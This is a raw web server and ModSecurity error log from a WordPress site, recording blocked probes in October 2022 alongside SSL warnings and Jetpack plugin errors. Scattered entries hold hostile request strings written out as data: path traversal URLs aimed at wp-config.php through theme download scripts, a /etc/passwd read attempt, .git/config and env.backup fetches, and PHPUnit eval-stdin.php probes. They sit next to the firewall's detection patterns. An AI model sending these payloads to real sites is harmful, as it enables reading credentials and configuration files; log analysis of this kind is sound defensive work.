[client 113.174.206.2] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y0IolAOvovS0nVHR09DDcAAAAQk"] 2022/10/08 22:20:47 [crit] 29434#29434: *366892 SSL_do_handshake() failed (SSL: error:14094085:SSL routines:ssl3_read_bytes:ccs received early) while SSL handshaking, client: 201.240.104.104, server: 198.199.72.26:443 [Sun Oct 09 03:22:30.243715 2022] [ssl:warn] [pid 11393:tid 139823319160704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 09 03:22:30.552844 2022] [ssl:warn] [pid 11394:tid 139823319160704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 09 03:22:31.305772 2022] [ssl:warn] [pid 11394:tid 139823319160704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 09 03:22:34.295652 2022] [ssl:warn] [pid 11394:tid 139823319160704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 09 03:22:36.669871 2022] [ssl:warn] [pid 11814:tid 140038115518336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 09 03:22:36.862925 2022] [ssl:warn] [pid 11817:tid 140038115518336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 09 16:32:42.206869 2022] [:error] [pid 11839:tid 140037786158848] [client 37.115.221.89:54576] [client 37.115.221.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "Y0M9-tYOj8XIuJrFHcROdQAAAAk"] [Sun Oct 09 16:32:47.810890 2022] [:error] [pid 11839:tid 140037918131968] [client 37.115.221.89:54578] [client 37.115.221.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "Y0M9_9YOj8XIuJrFHcROdgAAAAI"] [Sun Oct 09 16:32:51.958921 2022] [:error] [pid 12760:tid 140037901346560] [client 37.115.221.89:54580] [client 37.115.221.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "Y0M-AzIe5W8-kac2OUCqkQAAAMQ"] [Sun Oct 09 16:32:56.306263 2022] [:error] [pid 12760:tid 140037802944256] [client 37.115.221.89:54582] [client 37.115.221.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "Y0M-CDIe5W8-kac2OUCqkgAAAMc"] [Sun Oct 09 16:33:00.911463 2022] [:error] [pid 12760:tid 140037752588032] [client 37.115.221.89:54584] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Sun Oct 09 16:33:00.911736 2022] [:error] [pid 12760:tid 140037752588032] [client 37.115.221.89:54584] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Sun Oct 09 16:33:00.911898 2022] [:error] [pid 12760:tid 140037752588032] [client 37.115.221.89:54584] PHP Warning: require(ABSPATHWPINC/option.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/functions.php on line 8 [Sun Oct 09 16:33:00.912047 2022] [:error] [pid 12760:tid 140037752588032] [client 37.115.221.89:54584] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/option.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/functions.php on line 8 [Sun Oct 09 16:33:04.702554 2022] [:error] [pid 12760:tid 140037909739264] [client 37.115.221.89:54586] [client 37.115.221.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-swimteam/include/user/download.php"] [unique_id "Y0M-EDIe5W8-kac2OUCqlAAAAMM"] [Sun Oct 09 22:05:00.552468 2022] [:error] [pid 11841:tid 140037918131968] [client 103.133.214.139:42020] [client 103.133.214.139] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "113"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/widgets/blog.php"] [unique_id "Y0OL3NQjfDuLK9cXVzW65AAAAII"] [Mon Oct 10 03:44:25.314283 2022] [ssl:warn] [pid 1364:tid 139994443425664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 03:44:25.463049 2022] [ssl:warn] [pid 1365:tid 139994443425664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 03:44:25.793741 2022] [ssl:warn] [pid 1365:tid 139994443425664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 03:44:27.202352 2022] [ssl:warn] [pid 1365:tid 139994443425664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 03:44:29.456985 2022] [ssl:warn] [pid 1796:tid 140261526833024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 03:44:29.568755 2022] [ssl:warn] [pid 1797:tid 140261526833024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 11:06:16.514876 2022] [ssl:warn] [pid 1797:tid 140261526833024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 10 11:07:43.655397 2022] [ssl:warn] [pid 1797:tid 140261526833024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/10/10 11:23:42 [error] 16494#16494: *404869 access forbidden by rule, client: 64.225.49.158, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Oct 10 11:23:42.757598 2022] [authz_core:error] [pid 16671:tid 140261082461952] [client 64.225.49.158:43418] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2022/10/10 11:23:44 [error] 16494#16494: *404963 access forbidden by rule, client: 157.230.215.0, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/10/10 11:23:45 [error] 16494#16494: *404994 access forbidden by rule, client: 139.162.167.203, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/10/10 11:23:46 [error] 16493#16493: *405070 access forbidden by rule, client: 172.105.185.110, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/10/10 11:23:46 [error] 16494#16494: *405104 access forbidden by rule, client: 66.228.40.113, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/10/10 11:23:46 [error] 16494#16494: *405112 access forbidden by rule, client: 64.225.49.158, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/10/10 11:23:46 [error] 16493#16493: *405142 access forbidden by rule, client: 165.22.124.66, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/10/10 12:29:53 [alert] 16494#16494: *407016 pread() read only 11256 of 11425 from "/home/investig/public_html/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css" while sending response to client, client: 179.6.73.47, server: investigacionperu.com, request: "GET /wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16 HTTP/1.1", host: "investigacionperu.com", referrer: "https://investigacionperu.com/wp-admin/about.php?updated" [Mon Oct 10 12:31:24.041697 2022] [:error] [pid 16530:tid 140261124425472] [client 179.6.73.47:47298] PHP Warning: Declaration of Jetpack_IXR_Client::query() should be compatible with IXR_Client::query(...$args) in /home/investig/public_html/wp-content/plugins/jetpack/vendor/automattic/jetpack-connection/legacy/class-jetpack-ixr-client.php on line 122, referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.011902 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] PHP Fatal error: Uncaught Error: Class 'Automattic\\Jetpack\\Connection\\Urls' not found in /home/investig/public_html/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-sync/src/class-functions.php:374, referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.011984 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] Stack trace:, referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012044 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #0 [internal function]: Automattic\\Jetpack\\Sync\\Functions::main_network_site_url(), referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012162 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #1 /home/investig/public_html/wp-content/plugins/jetpack/vendor/automattic/jetpack-sync/src/modules/class-callables.php(213): call_user_func(Array), referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012244 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #2 [internal function]: Automattic\\Jetpack\\Sync\\Modules\\Callables->get_callable(Array), referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012359 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #3 /home/investig/public_html/wp-content/plugins/jetpack/vendor/automattic/jetpack-sync/src/modules/class-callables.php(197): array_map(Array, Array), referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012512 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #4 /home/investig/public_html/wp-content/plugins/jetpack/vendor/automattic/jetpack-sync/src/modules/class-callables.php(415): Automattic\\Jetpack\\Sync\\Modules\\Callables->get_all_callables(), referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012625 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #5 /home/investig/public_html/wp-includes/class-wp-hook.php(307): Automattic\\Jetpack\\Sync\\Modules\\Callables->maybe_sync_callables(''), referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade [Mon Oct 10 12:31:29.012791 2022] [:error] [pid 16530:tid 140261149603584] [client 179.6.73.47:47314] #6 /home/investig/public_ht in /home/investig/public_html/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-sync/src/class-functions.php on line 374, referer: https://investigacionperu.com/wp-admin/plugins.php?plugin_status=upgrade 2022/10/10 19:36:30 [error] 16493#16493: *416643 access forbidden by rule, client: 184.169.248.167, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/10/10 19:36:34 [error] 16494#16494: *416651 access forbidden by rule, client: 184.169.248.167, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/10 19:36:40 [error] 16494#16494: *416663 access forbidden by rule, client: 184.169.248.167, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Oct 10 19:52:34.535522 2022] [:error] [pid 16531:tid 140261090854656] [client 3.138.102.34:38676] [client 3.138.102.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y0S-UrTI0lKP2dVRng5eNAAAAJY"] [Mon Oct 10 19:53:11.002923 2022] [:error] [pid 16531:tid 140261099247360] [client 3.138.102.34:38798] [client 3.138.102.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y0S-d7TI0lKP2dVRng5eRQAAAJU"] [Tue Oct 11 00:14:15.309413 2022] [autoindex:error] [pid 16530:tid 140261166388992] [client 146.59.243.31:49792] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/10/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 11 06:18:55.639066 2022] [:error] [pid 22337:tid 140534425290496] [client 209.124.80.43:60560] [client 209.124.80.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y0VRH6BKlkjFPqrcdjMvRQAAAAw"] [Tue Oct 11 22:55:24.522263 2022] [:error] [pid 22338:tid 140534433683200] [client 193.56.29.120:42838] [client 193.56.29.120] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y0Y6rGINFIoIk7hPzpaX4wAAAEs"] [Tue Oct 11 22:55:24.707367 2022] [:error] [pid 22972:tid 140534416897792] [client 193.56.29.120:42840] [client 193.56.29.120] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y0Y6rOLrJ0tgpRmNRAaEPwAAAM0"] [Tue Oct 11 22:56:09.476275 2022] [:error] [pid 22339:tid 140534349756160] [client 193.56.29.120:42868] [client 193.56.29.120] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y0Y62dmZws0mEkXxGo-TUwAAAJU"] [Tue Oct 11 22:56:09.947547 2022] [:error] [pid 22339:tid 140534597625600] [client 193.56.29.120:42870] [client 193.56.29.120] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y0Y62dmZws0mEkXxGo-TVAAAAIA"] [Tue Oct 11 22:58:26.413534 2022] [:error] [pid 22972:tid 140534458861312] [client 193.56.29.120:42930] [client 193.56.29.120] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y0Y7YuLrJ0tgpRmNRAaESgAAAMg"] [Tue Oct 11 22:58:27.253110 2022] [:error] [pid 22972:tid 140534400112384] [client 193.56.29.120:42932] [client 193.56.29.120] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y0Y7Y-LrJ0tgpRmNRAaESwAAAM8"] [Wed Oct 12 02:47:53.496295 2022] [:error] [pid 22338:tid 140534467254016] [client 185.189.115.30:49524] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/down.php"] [unique_id "Y0ZxKWINFIoIk7hPzpaZBAAAAEc"] [Wed Oct 12 02:47:53.664561 2022] [:error] [pid 22337:tid 140534484039424] [client 185.189.115.30:49526] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "Y0ZxKaBKlkjFPqrcdjM3iAAAAAU"] [Wed Oct 12 02:47:53.815348 2022] [:error] [pid 22337:tid 140534425290496] [client 185.189.115.30:49528] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 